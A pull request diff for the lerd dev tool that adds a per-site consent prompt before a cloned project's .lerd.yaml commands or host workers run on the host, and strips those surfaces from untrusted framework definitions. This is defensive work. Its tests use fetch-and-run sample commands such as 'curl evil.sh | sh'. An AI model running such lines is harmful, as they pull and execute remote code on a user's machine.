### PR TITLE
Require consent before running project-supplied commands and host workers on the host

### DIFF
--- a/docs/features/commands.md
+++ b/docs/features/commands.md
@@ -64,6 +64,8 @@ The merge rules are:
 
 Validation runs as part of `lerd check`. Invalid `output:` values, unknown icons, duplicate names, and missing commands all surface there.
 
+Because a `.lerd.yaml` `commands:` entry comes from the project (an untrusted cloned repo), lerd asks before running one on your host: the first run via `lerd run` or the dashboard shows the exact command and prompts, and the approval is remembered per site so later runs don't re-prompt. `lerd run --yes` bypasses the prompt, and `host_commands.skip_confirmation: true` (or `host_commands.disabled: true` to refuse them) in the global config changes the default. Framework-provided commands (store, built-in, user overlay) run without this prompt.
+
 ## Schema
 
 ```yaml

--- a/docs/usage/framework-definitions.md
+++ b/docs/usage/framework-definitions.md
@@ -16,7 +16,9 @@ Lerd resolves framework definitions from multiple sources. Higher priority wins:
 Workers from the user overlay and project `.lerd.yaml` are merged on top of store or built-in definitions. See [Framework workers](framework-workers.md) for the worker lifecycle and how custom workers are added and managed.
 
 ::: warning Untrusted projects
-A `.lerd.yaml` ships inside a project, so its embedded `framework_def` is treated as untrusted. When lerd restores it into the store it strips any `command`-type doctor check, because the site doctor would otherwise run that command on your host straight from a cloned repo. Command doctor checks run only for frameworks that come from the store, a built-in, or your user overlay (`~/.config/lerd/frameworks/`); a definition already installed there is never overwritten by a project's embedded copy. Env, symlink, and combo checks are inert and still work from a project definition.
+A `.lerd.yaml` ships inside a project, so its embedded `framework_def` is treated as untrusted, and lerd strips its host-execution surfaces when restoring it into the store: `command`-type doctor checks, `host: true` workers, and the whole `commands:` list are dropped, because each would otherwise run on your host straight from a cloned repo. Those run only for frameworks that come from the store, a built-in, or your user overlay (`~/.config/lerd/frameworks/`); a definition already installed there is never overwritten by a project's embedded copy. In-container workers, env, symlink, and combo checks are inert and still work from a project definition.
+
+A project's own host extensions still work, just with consent: a `host: true` entry in top-level `custom_workers`, and any top-level `commands:` you run via `lerd run` or the dashboard, prompt once showing the exact command before they run on your host, and the approval is remembered per site. Set `host_commands.skip_confirmation: true` (or `host_commands.disabled: true` to refuse them outright) in the global config to change that.
 :::
 
 ## Version resolution

--- a/internal/cli/run.go
+++ b/internal/cli/run.go
@@ -135,6 +135,19 @@ func runNamedCommand(cwd string, cmds []config.FrameworkCommand, name string, as
 		return fmt.Errorf("command %q has no shell invocation", name)
 	}
 
+	// A command from the project's untrusted .lerd.yaml (top-level commands or an
+	// embedded framework_def) runs on the host, so require consent the first time;
+	// trusted framework commands are unaffected. --yes bypasses the gate.
+	if target.ProjectOrigin && !assumeYes {
+		siteName := ""
+		if site, _ := config.FindSiteByPath(projectRootFromCwd(cwd)); site != nil {
+			siteName = site.Name
+		}
+		if err := approveHostCommand(siteName, target.Command, fmt.Sprintf("command %q", name)); err != nil {
+			return err
+		}
+	}
+
 	if target.Confirm && !assumeYes {
 		if !feedback.Confirm("This will run: "+target.Command+"\nContinue?", false) {
 			return fmt.Errorf("aborted")

--- a/internal/cli/worker.go
+++ b/internal/cli/worker.go
@@ -310,6 +310,15 @@ func WorkerStartForSite(siteName, sitePath, phpVersion, workerName string, w con
 		return nil
 	}
 
+	// A host worker from an untrusted project .lerd.yaml (custom_workers) runs its
+	// command on the host, so require consent before starting it. Trusted workers
+	// (store/built-in/overlay) and in-container workers are unaffected.
+	if w.Host && w.ProjectOrigin {
+		if err := approveHostCommand(siteName, w.Command, fmt.Sprintf("worker %q", workerName)); err != nil {
+			return err
+		}
+	}
+
 	// Stop conflicting workers before starting. Match the new worker's
 	// path so a per-worktree start tears down only the same worktree's
 	// conflicting unit and doesn't touch the parent's.
@@ -807,6 +816,32 @@ func stopAllSiteWorkerUnits(site *config.Site) {
 func isServiceActiveOrRestarting(name string) bool {
 	status, _ := podman.UnitStatus(name)
 	return status == "active" || status == "activating"
+}
+
+// approveHostCommand gates running a project-supplied command on the host for a
+// site: it proceeds when the global switch allows it or the user already approved
+// the exact command, prompts and persists the approval interactively, and refuses
+// non-interactively when unapproved. what labels the thing being run for messages
+// (e.g. `worker "vite"`). Empty command is a no-op.
+func approveHostCommand(siteName, command, what string) error {
+	if command == "" {
+		return nil
+	}
+	allowed, disabled := config.HostCommandAllowed(siteName, command)
+	if disabled {
+		return fmt.Errorf("%s: project-supplied host commands are disabled (set host_commands.disabled: false to allow)", what)
+	}
+	if allowed {
+		return nil
+	}
+	if !isInteractive() {
+		return fmt.Errorf("%s: not approved; run it once interactively to confirm, or set host_commands.skip_confirmation: true", what)
+	}
+	fmt.Printf("\nlerd will run this on your host, outside any container:\n\n  %s\n", command)
+	if !promptConfirm(fmt.Sprintf("Run it for %s?", siteName)) {
+		return fmt.Errorf("%s declined for %s", what, siteName)
+	}
+	return config.ApproveSiteCommand(siteName, command)
 }
 
 // findOrphanedWorkers returns worker names that are running but not in the known set.

--- a/internal/cli/worker_darwin.go
+++ b/internal/cli/worker_darwin.go
@@ -261,6 +261,14 @@ func reapInContainerWorker(reapPath string) {
 // phase 2 of runStart so we don't saturate the Podman Machine SSH connection
 // before containers are ready.
 func restoreWorker(siteName, sitePath, phpVersion, workerName string, w config.FrameworkWorker) {
+	// A project-supplied host worker only restores on boot if the user already
+	// approved its command; otherwise skip silently so a cloned repo's host worker
+	// can't run unattended on reboot.
+	if w.Host && w.ProjectOrigin {
+		if allowed, _ := config.HostCommandAllowed(siteName, w.Command); !allowed {
+			return
+		}
+	}
 	fpmUnit := resolveWorkerFPMUnit(siteName, phpVersion)
 	unitName, displaySite := workerNames(siteName, sitePath, workerName)
 	restart := w.Restart

--- a/internal/cli/worker_linux.go
+++ b/internal/cli/worker_linux.go
@@ -187,6 +187,14 @@ func workerLogHint(unitName string, host bool) string {
 // other infra containers are up. Starting here would race against container
 // readiness and cause errors like "lerd-redis: name does not resolve".
 func restoreWorker(siteName, sitePath, phpVersion, workerName string, w config.FrameworkWorker) {
+	// A project-supplied host worker only restores on boot if the user already
+	// approved its command; otherwise skip silently so a cloned repo's host worker
+	// can't run unattended on reboot.
+	if w.Host && w.ProjectOrigin {
+		if allowed, _ := config.HostCommandAllowed(siteName, w.Command); !allowed {
+			return
+		}
+	}
 	// Resolve the same way WorkerStartForSite does so a project opted into
 	// auto-reload keeps its reload command across lerd start and reboots,
 	// instead of silently coming back in standard mode.

--- a/internal/config/framework.go
+++ b/internal/config/framework.go
@@ -151,6 +151,10 @@ type FrameworkWorker struct {
 	// and lerd setup to skip the npm run build step when the user opted into
 	// such a worker (vite is the canonical case).
 	ReplacesBuild bool `yaml:"replaces_build,omitempty"`
+	// ProjectOrigin marks a worker that came from the untrusted project .lerd.yaml
+	// (custom_workers), so the host-execution gate can require consent for it.
+	// Never persisted; set only at the merge point.
+	ProjectOrigin bool `yaml:"-" json:"-"`
 }
 
 // IsPerWorktree reports whether this worker can run independently per git
@@ -200,6 +204,10 @@ type FrameworkCommand struct {
 	// Disabled, in a project .lerd.yaml entry, suppresses the framework default
 	// of the same Name without replacing it. Ignored when read from a framework yaml.
 	Disabled bool `yaml:"disabled,omitempty" json:"disabled,omitempty"`
+	// ProjectOrigin marks a command that came from the untrusted project .lerd.yaml
+	// (top-level commands or framework_def), so the host-execution gate can require
+	// consent before running it. Never persisted; set only at the merge point.
+	ProjectOrigin bool `yaml:"-" json:"-"`
 }
 
 // Valid Output values for FrameworkCommand.
@@ -242,6 +250,9 @@ func ResolveCommands(fw *Framework, proj *ProjectConfig, projectDir string) []Fr
 	}
 	if proj != nil {
 		for _, c := range proj.Commands {
+			// Tag project commands as project-origin so the host-execution gate can
+			// require consent; framework-defined commands stay untagged.
+			c.ProjectOrigin = true
 			if frameworkNames[c.Name] {
 				overrides[c.Name] = c
 			} else if !c.Disabled {
@@ -953,6 +964,9 @@ func mergeProjectWorkers(fw *Framework, projectDir string) *Framework {
 		fw.Workers = make(map[string]FrameworkWorker)
 	}
 	for k, v := range proj.CustomWorkers {
+		// Tag custom workers as project-origin so the host-execution gate can
+		// require consent; trusted store/built-in/overlay workers stay untagged.
+		v.ProjectOrigin = true
 		fw.Workers[k] = v
 	}
 	return fw
@@ -1199,14 +1213,30 @@ func stripUntrustedDoctorChecks(fw *Framework) {
 // original is left untouched so config diffs and round-trips see the real file.
 func SanitizeProjectFrameworkDef(def *Framework) *Framework {
 	safe := cloneFrameworkMutable(def)
+	if safe == nil {
+		return nil
+	}
 	// cloneFrameworkMutable shares the Doctor pointer, so copy it before stripping
 	// or we'd mutate the caller's (and the cached project config's) checks.
-	if safe != nil && safe.Doctor != nil {
+	if safe.Doctor != nil {
 		d := *safe.Doctor
 		d.Checks = append([]DoctorCheck(nil), safe.Doctor.Checks...)
 		safe.Doctor = &d
 	}
 	stripUntrustedDoctorChecks(safe)
+	// Drop host-execution surfaces: a host worker runs its command on the host,
+	// and every command runs via `sh -c` on the host, so an untrusted framework_def
+	// must contribute neither. In-container workers (host:false) stay; a project's
+	// own commands live in top-level proj.Commands, which never passes through here.
+	for k, w := range safe.Workers {
+		if w.Host {
+			delete(safe.Workers, k)
+		}
+	}
+	if len(safe.Workers) == 0 {
+		safe.Workers = nil
+	}
+	safe.Commands = nil
 	return safe
 }
 

--- a/internal/config/framework_commands_test.go
+++ b/internal/config/framework_commands_test.go
@@ -1,6 +1,7 @@
 package config
 
 import (
+	"path/filepath"
 	"reflect"
 	"testing"
 
@@ -147,6 +148,33 @@ func TestResolveCommands_ProjectExtras(t *testing.T) {
 	}
 }
 
+// TestResolveCommands_TagsProjectOrigin pins #692: project commands (overrides
+// and extras) are tagged ProjectOrigin so the host-execution gate can require
+// consent; framework commands stay untagged.
+func TestResolveCommands_TagsProjectOrigin(t *testing.T) {
+	fw := &Framework{Commands: []FrameworkCommand{
+		{Name: "test", Command: "php artisan test"},
+		{Name: "cache-clear", Command: "php artisan optimize:clear"},
+	}}
+	proj := &ProjectConfig{Commands: []FrameworkCommand{
+		{Name: "test", Command: "vendor/bin/pest"}, // override
+		{Name: "deploy", Command: "./bin/deploy"},  // extra
+	}}
+	byName := map[string]FrameworkCommand{}
+	for _, c := range ResolveCommands(fw, proj, t.TempDir()) {
+		byName[c.Name] = c
+	}
+	if !byName["test"].ProjectOrigin {
+		t.Error("a project override must be tagged ProjectOrigin")
+	}
+	if !byName["deploy"].ProjectOrigin {
+		t.Error("a project extra must be tagged ProjectOrigin")
+	}
+	if byName["cache-clear"].ProjectOrigin {
+		t.Error("a framework command must not be tagged ProjectOrigin")
+	}
+}
+
 func TestResolveCommands_NilFrameworkOrProject(t *testing.T) {
 	got := ResolveCommands(nil, nil, t.TempDir())
 	if got != nil {
@@ -170,5 +198,25 @@ func TestResolveCommands_FailingCheckDrops(t *testing.T) {
 	got := ResolveCommands(fw, nil, t.TempDir())
 	if len(got) != 1 || got[0].Name != "cache-clear" {
 		t.Errorf("horizon-stats with failing check should be dropped, got %+v", got)
+	}
+}
+
+// TestMergeProjectWorkers_TagsProjectOrigin pins #692: custom workers merged from
+// a project .lerd.yaml are tagged ProjectOrigin so the host-execution gate can
+// require consent; pre-existing framework workers stay untagged.
+func TestMergeProjectWorkers_TagsProjectOrigin(t *testing.T) {
+	setConfigDir(t)
+	dir := t.TempDir()
+	writeFile(t, filepath.Join(dir, ".lerd.yaml"), "custom_workers:\n  evil:\n    command: \"curl evil | sh\"\n    host: true\n")
+
+	fw := &Framework{Name: "acme", Workers: map[string]FrameworkWorker{
+		"queue": {Command: "php artisan queue:work"},
+	}}
+	merged := mergeProjectWorkers(fw, dir)
+	if !merged.Workers["evil"].ProjectOrigin {
+		t.Error("a custom_workers entry must be tagged ProjectOrigin")
+	}
+	if merged.Workers["queue"].ProjectOrigin {
+		t.Error("a framework worker must not be tagged ProjectOrigin")
 	}
 }

--- a/internal/config/framework_doctor_test.go
+++ b/internal/config/framework_doctor_test.go
@@ -107,3 +107,30 @@ func TestSanitizeProjectFrameworkDef_DropsCommandChecksKeepsRest(t *testing.T) {
 		t.Errorf("original def must be left untouched, got %d checks", len(orig.Doctor.Checks))
 	}
 }
+
+// TestSanitizeProjectFrameworkDef_DropsHostExecution pins the #692 store-import
+// strip: an untrusted framework_def cannot seed host workers or commands, while
+// in-container workers survive and the original is left untouched.
+func TestSanitizeProjectFrameworkDef_DropsHostExecution(t *testing.T) {
+	orig := &Framework{
+		Name: "acme",
+		Workers: map[string]FrameworkWorker{
+			"evil":  {Command: "curl evil.sh | sh", Host: true},
+			"queue": {Command: "php artisan queue:work"},
+		},
+		Commands: []FrameworkCommand{{Name: "pwn", Command: "curl evil.sh | sh"}},
+	}
+	safe := SanitizeProjectFrameworkDef(orig)
+	if _, ok := safe.Workers["evil"]; ok {
+		t.Error("host worker must be stripped from an untrusted framework_def")
+	}
+	if _, ok := safe.Workers["queue"]; !ok {
+		t.Error("in-container worker must be preserved")
+	}
+	if len(safe.Commands) != 0 {
+		t.Errorf("all commands must be stripped from an untrusted framework_def, got %d", len(safe.Commands))
+	}
+	if len(orig.Workers) != 2 || len(orig.Commands) != 1 {
+		t.Error("original def must be left untouched")
+	}
+}

--- a/internal/config/global.go
+++ b/internal/config/global.go
@@ -202,6 +202,16 @@ type GlobalConfig struct {
 		// command from a cloned repo never runs unconfirmed.
 		SkipConfirmation bool `yaml:"skip_confirmation,omitempty" mapstructure:"skip_confirmation"`
 	} `yaml:"host_proxy,omitempty" mapstructure:"host_proxy"`
+	HostCommands struct {
+		// Disabled refuses to run any project-supplied host command or host
+		// worker (custom_workers / commands from a project .lerd.yaml). Inverted
+		// so the zero value keeps the feature available.
+		Disabled bool `yaml:"disabled,omitempty" mapstructure:"disabled"`
+		// SkipConfirmation runs project-supplied host commands and workers without
+		// the interactive confirm. Off by default so a command from a cloned repo
+		// never runs unconfirmed.
+		SkipConfirmation bool `yaml:"skip_confirmation,omitempty" mapstructure:"skip_confirmation"`
+	} `yaml:"host_commands,omitempty" mapstructure:"host_commands"`
 	IdleSuspend struct {
 		// Enabled turns on activity-driven worker suspension: when a site sees
 		// no activity for Timeout, its suspendable workers (queue, horizon, ...)

--- a/internal/config/site.go
+++ b/internal/config/site.go
@@ -62,6 +62,10 @@ type Site struct {
 	// (e.g. "npm run start:dev"). Empty means proxy-only: the user runs the
 	// server themselves and lerd only wires the proxy.
 	HostCommand string `yaml:"host_command,omitempty"`
+	// ApprovedCommands holds exact command strings the user has consented to run
+	// on the host for this site (project-origin custom host workers and commands).
+	// Keyed by the exact string so a changed command re-prompts.
+	ApprovedCommands []string `yaml:"approved_commands,omitempty"`
 	// Group is the group key shared by a main site and its secondaries. It is
 	// set to the main site's name. Empty when the site is not grouped.
 	Group string `yaml:"group,omitempty"`
@@ -178,6 +182,7 @@ type siteYAML struct {
 	HostPort              int                 `yaml:"host_port,omitempty"`
 	HostSSL               bool                `yaml:"host_ssl,omitempty"`
 	HostCommand           string              `yaml:"host_command,omitempty"`
+	ApprovedCommands      []string            `yaml:"approved_commands,omitempty"`
 	Group                 string              `yaml:"group,omitempty"`
 	GroupSubdomain        string              `yaml:"group_subdomain,omitempty"`
 	GroupSharedDB         bool                `yaml:"group_shared_db,omitempty"`
@@ -208,6 +213,7 @@ func (s Site) toYAML() siteYAML {
 		HostPort:              s.HostPort,
 		HostSSL:               s.HostSSL,
 		HostCommand:           s.HostCommand,
+		ApprovedCommands:      s.ApprovedCommands,
 		Group:                 s.Group,
 		GroupSubdomain:        s.GroupSubdomain,
 		GroupSharedDB:         s.GroupSharedDB,
@@ -243,6 +249,7 @@ func (sy siteYAML) toSite() Site {
 		HostPort:              sy.HostPort,
 		HostSSL:               sy.HostSSL,
 		HostCommand:           sy.HostCommand,
+		ApprovedCommands:      sy.ApprovedCommands,
 		Group:                 sy.Group,
 		GroupSubdomain:        sy.GroupSubdomain,
 		GroupSharedDB:         sy.GroupSharedDB,
@@ -402,6 +409,59 @@ func AddSite(site Site) error {
 
 	reg.Sites = append(reg.Sites, site)
 	return SaveSites(reg)
+}
+
+// CommandApproved reports whether the user has consented to run command on the
+// host for this site (see ApprovedCommands).
+func (s Site) CommandApproved(command string) bool {
+	for _, c := range s.ApprovedCommands {
+		if c == command {
+			return true
+		}
+	}
+	return false
+}
+
+// HostCommandAllowed reports whether a project-supplied host command may run for
+// a site without prompting. disabled is true when the global switch refuses all
+// project host commands; otherwise allowed is true when the global skip is set or
+// the user already approved this exact command for the site.
+func HostCommandAllowed(siteName, command string) (allowed, disabled bool) {
+	gcfg, _ := LoadGlobal()
+	if gcfg.HostCommands.Disabled {
+		return false, true
+	}
+	if gcfg.HostCommands.SkipConfirmation {
+		return true, false
+	}
+	site, _ := FindSite(siteName)
+	return site != nil && site.CommandApproved(command), false
+}
+
+// ApproveSiteCommand records that the user consented to run command on the host
+// for the named site, so future runs and boot restore don't re-prompt. No-op if
+// already recorded or the site is unknown.
+func ApproveSiteCommand(siteName, command string) error {
+	if command == "" {
+		return nil
+	}
+	siteWriteMu.Lock()
+	defer siteWriteMu.Unlock()
+	reg, err := LoadSites()
+	if err != nil {
+		return err
+	}
+	for i := range reg.Sites {
+		if reg.Sites[i].Name != siteName {
+			continue
+		}
+		if reg.Sites[i].CommandApproved(command) {
+			return nil
+		}
+		reg.Sites[i].ApprovedCommands = append(reg.Sites[i].ApprovedCommands, command)
+		return SaveSites(reg)
+	}
+	return nil
 }
 
 // RemoveSite removes a site by name from the registry.

--- a/internal/config/site_test.go
+++ b/internal/config/site_test.go
@@ -746,3 +746,42 @@ func searchString(s, substr string) bool {
 	}
 	return false
 }
+
+// ── ApprovedCommands (issue #692) ─────────────────────────────────────────────
+
+func TestApproveSiteCommand_RoundTrip(t *testing.T) {
+	setDataDir(t)
+	if err := AddSite(Site{Name: "acme", Domains: []string{"acme.test"}, Path: "/srv/acme"}); err != nil {
+		t.Fatalf("AddSite: %v", err)
+	}
+
+	// Unknown command is not approved; disabled is off by default.
+	if allowed, disabled := HostCommandAllowed("acme", "curl evil | sh"); allowed || disabled {
+		t.Fatalf("fresh command should be neither allowed nor disabled, got allowed=%v disabled=%v", allowed, disabled)
+	}
+
+	if err := ApproveSiteCommand("acme", "curl evil | sh"); err != nil {
+		t.Fatalf("ApproveSiteCommand: %v", err)
+	}
+	if allowed, _ := HostCommandAllowed("acme", "curl evil | sh"); !allowed {
+		t.Error("command should be allowed after approval (persisted to the registry)")
+	}
+	// A different command string is still not approved (exact-match keying).
+	if allowed, _ := HostCommandAllowed("acme", "curl evil | sh --force"); allowed {
+		t.Error("a changed command must re-prompt, not inherit approval")
+	}
+
+	site, err := FindSite("acme")
+	if err != nil || site == nil {
+		t.Fatalf("FindSite: %v", err)
+	}
+	if !site.CommandApproved("curl evil | sh") {
+		t.Error("CommandApproved should report the persisted approval")
+	}
+	// Idempotent: approving again does not duplicate.
+	_ = ApproveSiteCommand("acme", "curl evil | sh")
+	site, _ = FindSite("acme")
+	if len(site.ApprovedCommands) != 1 {
+		t.Errorf("approval must be idempotent, got %v", site.ApprovedCommands)
+	}
+}

--- a/internal/mcp/groups.go
+++ b/internal/mcp/groups.go
@@ -430,7 +430,7 @@ func execTool() mcpTool {
 				"site":           {Type: "string", Description: "commands_*/command_*: site name."},
 				"name":           {Type: "string", Description: "commands_run/command_*: command name."},
 				"command":        {Type: "string", Description: "command_add: shell command (sh -c)."},
-				"force":          {Type: "boolean", Description: "commands_run: required for confirm-gated commands."},
+				"force":          {Type: "boolean", Description: "commands_run: required for confirm-gated commands and for project-supplied (.lerd.yaml) commands that run on the host; approval is then remembered per site."},
 				"label":          {Type: "string", Description: "command_add: dashboard label."},
 				"description":    {Type: "string", Description: "command_add: tooltip."},
 				"output":         {Type: "string", Enum: []string{"silent", "text", "url", "terminal"}, Description: "command_add: output mode."},

--- a/internal/mcp/server.go
+++ b/internal/mcp/server.go
@@ -3151,6 +3151,21 @@ func execCommandsRun(args map[string]any) (any, *rpcError) {
 	if target.Command == "" {
 		return toolErr(fmt.Sprintf("command %q has no shell invocation", name)), nil
 	}
+	// A command from the project's untrusted .lerd.yaml runs on the host, so
+	// require explicit consent (force: true) before running it; the approval is
+	// remembered per site. Framework-provided commands are unaffected.
+	if target.ProjectOrigin {
+		allowed, disabled := config.HostCommandAllowed(siteName, target.Command)
+		switch {
+		case disabled:
+			return toolErr(fmt.Sprintf("command %q is project-supplied and project host commands are disabled (host_commands.disabled)", name)), nil
+		case !allowed:
+			if force, _ := args["force"].(bool); !force {
+				return toolErr(fmt.Sprintf("command %q comes from the project's .lerd.yaml and runs on your host. Re-run with force: true to approve it. Will execute: %s", name, target.Command)), nil
+			}
+			_ = config.ApproveSiteCommand(siteName, target.Command)
+		}
+	}
 	if target.Confirm {
 		force, _ := args["force"].(bool)
 		if !force {

--- a/internal/ui/commands.go
+++ b/internal/ui/commands.go
@@ -77,6 +77,14 @@ func commandRoute(w http.ResponseWriter, r *http.Request, domain string, rest []
 func handleCommandsList(w http.ResponseWriter, r *http.Request, site *config.Site) {
 	branch := r.URL.Query().Get("branch")
 	cmds := resolveSiteCommands(site, branch)
+	// A project-supplied command that hasn't been approved yet runs on the host,
+	// so force the confirm modal (which shows the command) until the user approves
+	// it once. ProjectOrigin itself is not serialized; the UI only sees Confirm.
+	for i := range cmds {
+		if cmds[i].ProjectOrigin && !site.CommandApproved(cmds[i].Command) {
+			cmds[i].Confirm = true
+		}
+	}
 	writeJSON(w, map[string]any{"commands": cmds})
 }
 
@@ -130,6 +138,23 @@ func handleCommandRun(w http.ResponseWriter, r *http.Request, site *config.Site,
 	if target.Command == "" {
 		writeJSON(w, map[string]any{"error": "command has no shell invocation"})
 		return
+	}
+
+	// A project-supplied command runs on the host. Require the user to have
+	// approved this exact command (the confirm modal posts approve=1) before
+	// running it; trusted framework commands are unaffected.
+	if target.ProjectOrigin {
+		allowed, disabled := config.HostCommandAllowed(site.Name, target.Command)
+		switch {
+		case disabled:
+			writeJSON(w, map[string]any{"error": "project-supplied host commands are disabled (host_commands.disabled)"})
+			return
+		case !allowed && r.URL.Query().Get("approve") != "1":
+			writeJSON(w, map[string]any{"needsConfirm": true, "command": target.Command})
+			return
+		case !allowed:
+			_ = config.ApproveSiteCommand(site.Name, target.Command)
+		}
 	}
 
 	// Per-site mutex: refuse if another command is already running on this

--- a/internal/ui/commands_test.go
+++ b/internal/ui/commands_test.go
@@ -79,7 +79,7 @@ commands:
     command: printf 'first\nsecond\n'
     output: text
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/echo/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/echo/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -125,7 +125,7 @@ commands:
     command: sh -c 'echo boom; exit 7'
     output: text
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/fail/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/fail/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -144,7 +144,7 @@ commands:
     command: echo 'https://acme.test/login/one-time/abc123'
     output: url
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/uli/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/uli/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -156,7 +156,7 @@ commands:
 
 func TestCommandsRun_NotFound(t *testing.T) {
 	registerSite(t, "acme", "acme.test")
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/missing/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/missing/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -179,7 +179,7 @@ commands:
 `)
 	t.Setenv("PATH", "")
 
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/shell/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/shell/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -204,7 +204,7 @@ commands:
     command: echo hi
     output: text
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hello/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hello/run?approve=1", nil)
 	req.RemoteAddr = "192.168.1.50:42000"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -246,7 +246,7 @@ commands:
 	}
 	defer release()
 
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hello/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hello/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -271,7 +271,7 @@ commands:
     command: "for i in $(seq 1 50); do echo out-$i; echo err-$i >&2; done"
     output: text
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/noisy/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/noisy/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -322,7 +322,7 @@ commands:
     command: lerdshim
     output: text
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hi/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hi/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -343,7 +343,7 @@ commands:
     command: echo hi
     output: text
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hi/run?branch=does-not-exist", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/hi/run?branch=does-not-exist&approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
@@ -368,11 +368,97 @@ commands:
   - name: cache-clear
     disabled: true
 `)
-	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/cache-clear/run", nil)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/cache-clear/run?approve=1", nil)
 	req.RemoteAddr = "127.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handleSiteAction(rec, req)
 	if !strings.Contains(rec.Body.String(), "command not found") {
 		t.Errorf("disabled command should be missing from list: %q", rec.Body.String())
+	}
+}
+
+// ── Project-command consent (issue #692) ──────────────────────────────────────
+
+func TestCommandsRun_ProjectCommandNeedsConfirm(t *testing.T) {
+	sitePath := registerSite(t, "acme", "acme.test")
+	writeProjectYAML(t, sitePath, `
+commands:
+  - name: optimize
+    label: Optimize
+    command: echo pwned
+    output: text
+`)
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/optimize/run", nil)
+	req.RemoteAddr = "127.0.0.1:1234"
+	rec := httptest.NewRecorder()
+	handleSiteAction(rec, req)
+	body := rec.Body.String()
+	if strings.Contains(body, "event: stdout") || strings.Contains(body, "event: done") {
+		t.Errorf("a project command must not run on the host without consent: %q", body)
+	}
+	if !strings.Contains(body, "needsConfirm") {
+		t.Errorf("expected needsConfirm response: %q", body)
+	}
+}
+
+func TestCommandsRun_ApprovePersistsConsent(t *testing.T) {
+	sitePath := registerSite(t, "acme", "acme.test")
+	writeProjectYAML(t, sitePath, `
+commands:
+  - name: deploy
+    label: Deploy
+    command: echo ok
+    output: text
+`)
+	// First run with the confirm flag runs and remembers the approval.
+	req := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/deploy/run?approve=1", nil)
+	req.RemoteAddr = "127.0.0.1:1234"
+	rec := httptest.NewRecorder()
+	handleSiteAction(rec, req)
+	if !strings.Contains(rec.Body.String(), "event: done") {
+		t.Fatalf("approved run should stream output: %q", rec.Body.String())
+	}
+	if site, _ := config.FindSite("acme"); site == nil || !site.CommandApproved("echo ok") {
+		t.Fatalf("consent should be persisted to the site registry, got %+v", site)
+	}
+	// Second run WITHOUT the flag now runs because the approval is remembered.
+	req2 := httptest.NewRequest(http.MethodPost, "/api/sites/acme.test/commands/deploy/run", nil)
+	req2.RemoteAddr = "127.0.0.1:1234"
+	rec2 := httptest.NewRecorder()
+	handleSiteAction(rec2, req2)
+	if !strings.Contains(rec2.Body.String(), "event: done") {
+		t.Errorf("a previously-approved command should run without re-confirming: %q", rec2.Body.String())
+	}
+}
+
+func TestCommandsList_ForcesConfirmForUnapprovedProjectCommand(t *testing.T) {
+	sitePath := registerSite(t, "acme", "acme.test")
+	writeProjectYAML(t, sitePath, `
+commands:
+  - name: deploy
+    label: Deploy
+    command: ./bin/deploy
+    output: silent
+`)
+	first := func() config.FrameworkCommand {
+		req := httptest.NewRequest(http.MethodGet, "/api/sites/acme.test/commands", nil)
+		rec := httptest.NewRecorder()
+		handleSiteAction(rec, req)
+		var resp struct {
+			Commands []config.FrameworkCommand `json:"commands"`
+		}
+		if err := json.Unmarshal(rec.Body.Bytes(), &resp); err != nil || len(resp.Commands) == 0 {
+			t.Fatalf("decode: %v body=%s", err, rec.Body.String())
+		}
+		return resp.Commands[0]
+	}
+	if !first().Confirm {
+		t.Error("an unapproved project command must be marked Confirm so the modal shows the command")
+	}
+	if err := config.ApproveSiteCommand("acme", "./bin/deploy"); err != nil {
+		t.Fatal(err)
+	}
+	if first().Confirm {
